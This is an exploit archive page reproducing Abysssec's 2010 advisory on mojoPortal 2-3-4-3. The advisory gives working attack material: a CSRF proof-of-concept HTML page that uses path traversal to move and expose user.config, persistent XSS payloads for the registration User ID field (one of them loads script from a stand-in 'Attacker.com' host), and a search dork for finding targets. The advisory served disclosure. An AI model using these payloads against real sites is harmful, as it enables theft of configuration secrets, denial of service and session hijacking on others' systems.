exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Month Of Abysssec Undisclosed Bugs - mojoPortal

Month Of Abysssec Undisclosed Bugs - mojoPortal
Posted Sep 17, 2010
Authored by Abysssec | Site abysssec.com

Month Of Abysssec Undisclosed Bugs - mojoPortal version 2-3-4-3 suffers from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 85e6081aa968c24ce274615fcbd4a4ab9de0f779a3b3bcb6b2482be71c9920ae

Month Of Abysssec Undisclosed Bugs - mojoPortal

Change Mirror Download
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/

'''


Abysssec Inc Public Advisory


Title : mojoportal Multiple Remote Vulnerabilities
Affected Version : mojoPortal 2-3-4-3
Discovery : www.Abysssec.com
Vendor : http://www.mojoportal.com/

Demo : http://demo.mojoportal.com/
Download Links : http://www.mojoportal.com/download.aspx
http://mojoportal.codeplex.com/releases/view/46512

Detailes : Includes Blogs, Forums, Event Calendar, Google Maps, Photo Galleries,
Chat, ecommerce, Secure File Sharing, Newsletter, Surveys, Polls, and much more.

Documentaion : http://www.mojoportal.com/documentation.aspx

Dork : "Powered by mojoPortal"



Admin Page : http://Example.com/Secure/Login.aspx


Description :
===========================================================================================
This version of mojoportal(mojoPortal 2-3-4-3) have Multiple Valnerabilities :
1- CSRF Move Files for download and DDOS attack
2- Persistent XSS


1) CSRF Move Files for download and DDOS attack:
===========================================================================================

With This vulnerability you can feed the malicious link to Admin of site (when he is already logged in)
to move a file with Administrator Privilege.
In this path you can find a method that move files to any path:

http://Example.com/Services/FileService.ashx

With this command we can move user.config file to user.config.aaa:
http://Example.com/Services/FileService.ashx?cmd=movefile&srcPath=./../../../user.config&destPath=./../../../user.config.aaa

and then we can download it from URL:
http://Example.com/user.config.aaa


Vulnerable Code:
../Services/FileService.ashx.cs
ln 308: result = fileSystem.MoveFile(srcPath, destPath, false);


here is HTML File with AJAX Code for move user.config file to any path that is enough to Admin meet it.
For this porpuse you can enter your malicious URL in this Path (in Web Site URL field) :
http://localhost:60941/Secure/UserProfile.aspx



The Source of HTML Page (Maliciouse Link)
===========================================================================================
With this page, we send a request with AJAX.


<html>
<head>
<title >Wellcome to MojoPortal!</title>
Hello!
...
...
...
This page move user.config file to another path for DDOS Attack and download new file from server.

<script>
function FileMove() {
//alert('FileMove');
//// For Mozila FireFox this code must be writen
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
} catch (e) {
//alert("Permission to read file was denied.");
}

var http = false;
//alert(navigator.appName); //// It Get Browser Type
if (window.XMLHttpRequest) {
http = new XMLHttpRequest(); // Firefox, Safari, ...
//alert('XMLHttpRequest');
}
else if (window.ActiveXObject) {
http = new ActiveXObject("Microsoft.XMLHTTP"); // Internet Explorer
//alert('ActiveXObject');
}

url = "http://localhost:60941/Services/FileService.ashx?cmd=movefile&srcPath=./../../../user.config&destPath=./../../../user.config.aaa";
http.onreadystatechange = done;
http.open('GET', url, true);
http.send(null);
}
function done() {
if (http.readyState == 4 && http.status == 200) {
//alert(http.responseText);
//alert('Upload OK');
}
}
</script>
</head>
<body onload ="FileMove();">

</body>
</html>




2) Persistent XSS Vulnerability:
===========================================================================================

In these URL you can see a persistent XSS Vulnerability:

http://Example.com/Secure/Register.aspx

you can enter this value for User ID and there is sanitization:

User ID : user3</title><script>alert('sanitization')</script>

and register in site.
When another users see your Profile in this path (for Example):
http://Example.com/ProfileView.aspx?userid=5

Then you will receive your alert and script execution.

Vulnerable Code:
../Secure/Register.aspx.cs
ln 166: TextBox txtUserName = (TextBox)CreateUserWizardStep1.ContentTemplateContainer.FindControl("UserName");


Attention:
The User ID field is limited to 50 character. As aresult you can for example enter this value:
User ID : u1</title><img src="http://Attacker.com/t.js">



===========================================================================================

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close